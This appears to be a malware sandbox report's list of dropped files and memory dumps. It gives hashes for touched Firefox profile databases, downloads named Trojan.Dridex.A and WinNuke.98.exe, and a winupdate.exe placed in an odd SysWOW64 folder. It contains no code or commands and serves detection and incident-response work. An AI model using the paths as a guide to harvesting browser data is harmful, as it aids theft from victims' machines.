C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\protections.sqlite

Filesize
64KB

MD5
d7e5433a87ae3a30de4ab9adc47023bf

SHA1
4edaec48083abd90bc532ba8dd015fe209b0e439

SHA256
c2da29c9c40900e9ae211f9083849b86355850faa503062d14ced549563f273e

SHA512
9b28c36dbe02dff99519fac684c8cb88b8a40b06454524ebf79e576bd22cd94ae0eabb2655aba32bc118767f645d4e12da06764ca5d73c4e42fc2c2e0c343961

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\sessionCheckpoints.json

Filesize
288B

MD5
362985746d24dbb2b166089f30cd1bb7

SHA1
6520fc33381879a120165ede6a0f8aadf9013d3b

SHA256
b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e

SHA512
0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\sessionstore.jsonlz4

Filesize
1KB

MD5
4e3c82ba69e7a6723184b05d04f74bc5

SHA1
aec2133253a0e7dd2eb9b7ebfcb4351ba7cac7de

SHA256
1ec68eebb080ddfdbd919dc96bbfa2259be9aa9af649365f827b1df4d4f0cb85

SHA512
60ff738c3e6b60314e2327fe093f7e8a1558dff3988cc9aeb1a12e9ba0d26883a7f9c51ffdcbad77cde49497858adf7e1b766a428946e264c18599f142b1a72c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

Filesize
48KB

MD5
c0fc95811fec27d162f9c781ceaaa4ab

SHA1
791296d4aebef9288884fd11d723a47a9cfa567b

SHA256
ff7fd94117d97ef5808e056e8d2824170f8a4033179a7ad0cd3b0571f3f7b2d4

SHA512
4635bec62fe43e9ea7a653d7e48fbd40ea02d02b287388873565b2b2606a30e07a1b28ed466f789324accc583b98f9f4450197bd68421c6d36859bc43a4ff3c2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
376KB

MD5
ebdeeab3e1c842995f8639bd7940041e

SHA1
11ae4fbb94c9a98872260b6a8e5725756fe6da01

SHA256
389a83238bb0066b98d48bf13082b2b418abf75339547782794b64e009132622

SHA512
db4103073fc89bc2714271d3d3d9465024a626222f028f938db5e09f25c218304523b4ee53d3b534d712422c5ee47cb149b1e5d101342fc9bdda6866aabcb0af

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\targeting.snapshot.json

Filesize
4KB

MD5
ac50aadd238fb3d9d8ffd38a0e4228dc

SHA1
1fd8e5a8cc4e6e4b0f85293897907b8871742742

SHA256
5ddc1ce43582db5ae35bbc650b11e409969e580dc70b7e97d3ef790f3bfc8e3c

SHA512
c8178f25d3ea7ffb9720905de1cb09dd8603cc601b362881ab6d9f42836f308047590f3263bf3b2a6c92be4704ecd4e0b3a23f4537e62bfac200ef2259c06386

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\xulstore.json

Filesize
342B

MD5
9891bfff17a923d34df8f2097df1b122

SHA1
7374f6ad47392c40ccec8baf7677b9c7905f4f84

SHA256
72fcc2afff61b40b2eb2f47c7a5b35bad9056aeeb7f0adf0a3089cfe773f551e

SHA512
62ed63e2098010c249634e3ec8c801abd8985fc49080f65fdfacbf187793d5f509d02614572ab117172ded355d68004ddd3e576a2aa4ebbe9632358a330aa72d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\profiles.ini

Filesize
472B

MD5
77f537fc2195635265354fcc593cd61e

SHA1
2af2a4538962e2583b6c5f0ee13e96af8c9317d4

SHA256
85366cb13b6582f5dd064c359911b3641127986f7eba940c40da260afcaae5d4

SHA512
67ccac00514010f60ac5b2feef4cbda8c5ca7a9c4c0e7f84ec4aa5cd454b11530994c1e6f764be5cb0260165252d5051d0675c9873bb7d219af95deeeea96df1

Download Submit
C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
41e60d36576978fbe8b12377ed32591d

SHA1
b7d47f92adb5f382a2a53944901b051bf8141886

SHA256
3f0da3b69c05ec2c678d4325d44702bc39592eeef51f19f7bef1b8c6846be6ce

SHA512
d10938f8112e42c22721ee3122dca278ffefb661b175d5fe80a47657726e9e84593acc511a0eda280b45520c4ec2e8beb22b050b9f71d16c93ed578bec67b511

Download Submit
C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
a111a9fbaaea7d5efc8734f1652bb312

SHA1
80fa609eb6e914d90be4ce2471ba6842856a8b01

SHA256
9468ef9009259d0e7475d134a2ad48f99791404a9f9d05090bf95afc2b176b8f

SHA512
08e5e99caa2e1fd16f2c7ebcf96a1cb26926328b66b8b6056c1955c662804cff8675045a49730198af6ab8a551945b2acf3668de516d3d12d4df13212d78cc09

Download Submit
C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82\Network\Network Persistent State

Filesize
1KB

MD5
0e462730a23a3c1189319c9f34458516

SHA1
3454e54793e30d02ccb8f3f71f48c3d47e61122a

SHA256
36353f797311a4edc64d271af96671d23c4928eed5967fd32221ee84ca045abe

SHA512
8a9151c7eb1b7a0d688f06a9e95eb87d58010822e3e18a0ad02814cfe66931290045dbc13561bad23d30e14a8494e810fca3fe0c8523b48299473222efd885b5

Download Submit
C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82\Network\Network Persistent State~RFe60cbc0.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Roaming\furk-ultra-nativefier-e68f82\Session Storage\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\Desktop\Old Firefox Data\p38rro19.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm

Filesize
32KB

MD5
b7c14ec6110fa820ca6b65f5aec85911

SHA1
608eeb7488042453c9ca40f7e1398fc1a270f3f4

SHA256
fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb

SHA512
d8d75760f29b1e27ac9430bc4f4ffcec39f1590be5aef2bfb5a535850302e067c288ef59cf3b2c5751009a22a6957733f9f80fa18f2b0d33d90c068a3f08f3b0

Download Submit
C:\Users\Admin\Desktop\Old Firefox Data\p38rro19.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite

Filesize
48KB

MD5
485282574ba38acd95c879b606808302

SHA1
d900f51f924d2bc9ad8dfeb109c48c18b538e75f

SHA256
1c547746effd9c6a5fbe86ffab62c82b3a14525d2c7a19f46bae7bf4060a3f8f

SHA512
6db88499469c22cf320a4ff144ba41348fff5cb895e192f484aca7fcbf8f0a613680bf1239a9130cbff32ec8837512da89f666a9e3fb122a866db8881f94458c

Download Submit
C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_

Filesize
132KB

MD5
dbf96ab40b728c12951d317642fbd9da

SHA1
38687e06f4f66a6a661b94aaf4e73d0012dfb8e3

SHA256
daab430bb5771eaa7af0fbd3417604e8af5f4693099a6393a4dc3b440863bced

SHA512
a49cc96651d01da5d6cbb833df36b7987eafb4f09cc9c516c10d0d812002d06ae8edee4e7256c84e300dc2eadad90f7bb37c797bccdee4bad16fcaf88277b381

Download Submit
C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_:Zone.Identifier

Filesize
339B

MD5
8ed033a648374e31c2086451d66c583c

SHA1
d8d92ce53cbdf253e9d96a5e2a152bfc4c317d9f

SHA256
bf90877747c55714f25f6c5052f40b12a89425f0cd4598dedd0fe65ec7825b6e

SHA512
928daeda6d675fae44fccadd804dfc0d8ccdc8bfac7bf4b3b990d1820491401d8dd455fc14cde095e78037219678114f44ce60b62d7595a38f969de77e2352f9

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 218570.crdownload

Filesize
32KB

MD5
eb9324121994e5e41f1738b5af8944b1

SHA1
aa63c521b64602fa9c3a73dadd412fdaf181b690

SHA256
2f1f93ede80502d153e301baf9b7f68e7c7a9344cfa90cfae396aac17e81ce5a

SHA512
7f7a702ddec8d94cb2177b4736d94ec53e575be3dd2d610410cb3154ba9ad2936c98e0e72ed7ab5ebbcbe0329be0d9b20a3bcd84670a6d1c8d7e0a9a3056edd2

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 219456.crdownload

Filesize
125KB

MD5
ea534626d73f9eb0e134de9885054892

SHA1
ab03e674b407aecf29c907b39717dec004843b13

SHA256
322eb96fc33119d8ed21b45f1cd57670f74fb42fd8888275ca4879dce1c1511c

SHA512
c8cda90323fd94387a566641ec48cb086540a400726032f3261151afe8a981730688a4dcd0983d9585355e22833a035ef627dbd1f643c4399f9ddce118a3a851

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 261650.crdownload

Filesize
532KB

MD5
00add4a97311b2b8b6264674335caab6

SHA1
3688de985909cc9f9fa6e0a4f2e43d986fe6d0ec

SHA256
812af0ec9e1dfd8f48b47fd148bafe6eecb42d0a304bc0e4539750dd23820a7f

SHA512
aaf5dae929e6b5809b77b6a79ab833e548b66fb628afeb20b554d678947494a6804cb3d59bf6bbcb2b14cede1a0609aa41f8e7fe8a7999d578e8b7af7144cb70

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 28025.crdownload

Filesize
414KB

MD5
c850f942ccf6e45230169cc4bd9eb5c8

SHA1
51c647e2b150e781bd1910cac4061a2cee1daf89

SHA256
86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f

SHA512
2b3890241b8c8690aab0aed347daa778aba20f29f76e8b79b02953b6252324317520b91ea60d3ef73e42ad403f7a6e0e3f2a057799f21ed447dae7096b2f47d9

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 38340.crdownload

Filesize
2.8MB

MD5
cce284cab135d9c0a2a64a7caec09107

SHA1
e4b8f4b6cab18b9748f83e9fffd275ef5276199e

SHA256
18aab0e981eee9e4ef8e15d4b003b14b3a1b0bfb7233fade8ee4b6a22a5abbb9

SHA512
c45d021295871447ce60250ff9cbeba2b2a16a23371530da077d6235cfe5005f10fa228071542df3621462d913ad2f58236dc0c0cb390779eef86a10bba8429f

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 769575.crdownload

Filesize
756KB

MD5
c7dcd585b7e8b046f209052bcd6dd84b

SHA1
604dcfae9eed4f65c80a4a39454db409291e08fa

SHA256
0e8336ed51fe4551ced7d9aa5ce2dde945df8a0cc4e7c60199c24dd1cf7ccd48

SHA512
c5ba102b12d2c685312d7dc8d58d98891b73243f56a8491ea7c41c2edaaad44ad90b8bc0748dbd8c84e92e9ae9bbd0b0157265ebe35fb9b63668c57d0e1ed5f2

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 822797.crdownload

Filesize
4.3MB

MD5
75071cdbece82a6923560953b4d3b8d4

SHA1
d3fa3d0ec58243815c7179cdae1459e2fcf4384d

SHA256
e872698682454c573c615dae4fe05100ec3452576084beb116c3dc205065d0fa

SHA512
27abecd3e4d8fd42bc4405ccf2acceb376c0118120f2cbd85e96166c465a8f2ce311a94bf254a7e9589938d3583509240921fe87db4e8429497877bf673c06fb

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 976554.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier

Filesize
225B

MD5
d029fe7d77c9aec3eec6e492c2d98234

SHA1
0e7c31ea8eb0d83f58c2e5c4d719ac590af5461f

SHA256
ca53ed58ecfb4413867214ace3c58d22ccd43ae254c3ff8bb99afbc989c139c4

SHA512
ad3bc83d249434a4fcf189ecc956a79d0dd6bd987b150b5ebc3982a45927fcd1e812f06b618eb6a4c67e61e6c22857c89a147be6c28167f5d6975bdf4451972c

Download Submit
C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\XenoUI.exe

Filesize
140KB

MD5
f0d6a8ef8299c5f15732a011d90b0be1

SHA1
5d2e6cc0bd4f1e810808f2a284f6c2a30b21edcf

SHA256
326bae0bd1398234dcef4c3d71f00e30cc9b447fa963e21d6f29605f42bb7e5b

SHA512
5b9f1517949a7fa9fdb7413146632d21a4208dc92823b673af85963ae5cc7f827b3ba27f3e9c5554c45e726ad159aac77d30306acc3559bd8712534e41ff0f27

Download Submit
C:\Users\Admin\Downloads\libcrypto-3-x64.dll

Filesize
5.0MB

MD5
54ca3e6afcb3c57c7914c0856d779f2a

SHA1
e37be8d92350aa1f9dd3212015de959faa58aa2f

SHA256
7aed0bc00d2f0ca0de95eaa6461327bd2e4543723a6ca443a7e899738b353b5a

SHA512
e8079e9d4bfa253677a669913f8198882c2eaaf9251f11cfa64eed5597c34ab7c267bed3826ad9f0a83675177a7575af54081852a5a633d999bd13cf873a79e8

Download Submit
C:\Users\Admin\Downloads\libcrypto-3-x64.dll:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier

Filesize
221B

MD5
f1b325288486362f1dc3ad9f592bdde6

SHA1
5204e7fd2ae9dcc986fa693c9e862a8ea7340539

SHA256
96d5cab2345d032d020aaa521771975cbce108fd905aeac11d94e7e7940ff962

SHA512
f8261d8d9c933172c2dbf3b8387b779f271724de52b216f9c2e7a7fc8da6bab285b69c9e10bda987825e894053de83292146c4e2253e45448a7fa106f7732e31

Download Submit
memory/704-1840-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/1844-2270-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/1928-2265-0x00000194D6280000-0x00000194D62A2000-memory.dmp

Filesize
136KB

Download
memory/1928-2266-0x00000194D62B0000-0x00000194D62BC000-memory.dmp

Filesize
48KB

Download
memory/3148-1853-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/3348-1721-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/3348-1710-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/3348-1720-0x00000000000E0000-0x0000000000155000-memory.dmp

Filesize
468KB

Download
memory/3936-4545-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/3936-4552-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/3936-4546-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/3936-4554-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/3936-4553-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/3936-4551-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/3936-4547-0x000001A21B8F0000-0x000001A21B8F1000-memory.dmp

Filesize
4KB

Download
memory/4276-1699-0x00000000005A0000-0x0000000000615000-memory.dmp

Filesize
468KB

Download
memory/4276-1700-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/4276-1697-0x0000000010000000-0x0000000010030000-memory.dmp

Filesize
192KB

Download
memory/4300-2281-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/4532-2267-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/4532-1900-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/4536-1841-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/4636-1851-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/5516-2241-0x00000252E5F90000-0x00000252E5FBC000-memory.dmp

Filesize
176KB

Download
memory/5532-2271-0x0000000013140000-0x000000001320F000-memory.dmp

Filesize
828KB

Download
memory/6172-4024-0x00007FFA16DB0000-0x00007FFA16DB1000-memory.dmp

Filesize
4KB

Download
memory/6172-4025-0x00007FFA16300000-0x00007FFA16301000-memory.dmp

Filesize
4KB

Download
memory/6488-3950-0x0000000000FA0000-0x0000000001283000-memory.dmp

Filesize
2.9MB

Download
memory/6636-3953-0x00007FFA17780000-0x00007FFA17781000-memory.dmp

Filesize
4KB

Download
memory/7084-5127-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/7084-5129-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/7272-5169-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/7272-5167-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/7660-5209-0x0000000005100000-0x000000000510A000-memory.dmp

Filesize
40KB

Download
memory/7660-5208-0x0000000005060000-0x00000000050F2000-memory.dmp

Filesize
584KB

Download
memory/7660-5207-0x0000000005750000-0x0000000005CF6000-memory.dmp

Filesize
5.6MB

Download
memory/7660-5206-0x0000000000690000-0x00000000006FE000-memory.dmp

Filesize
440KB

Download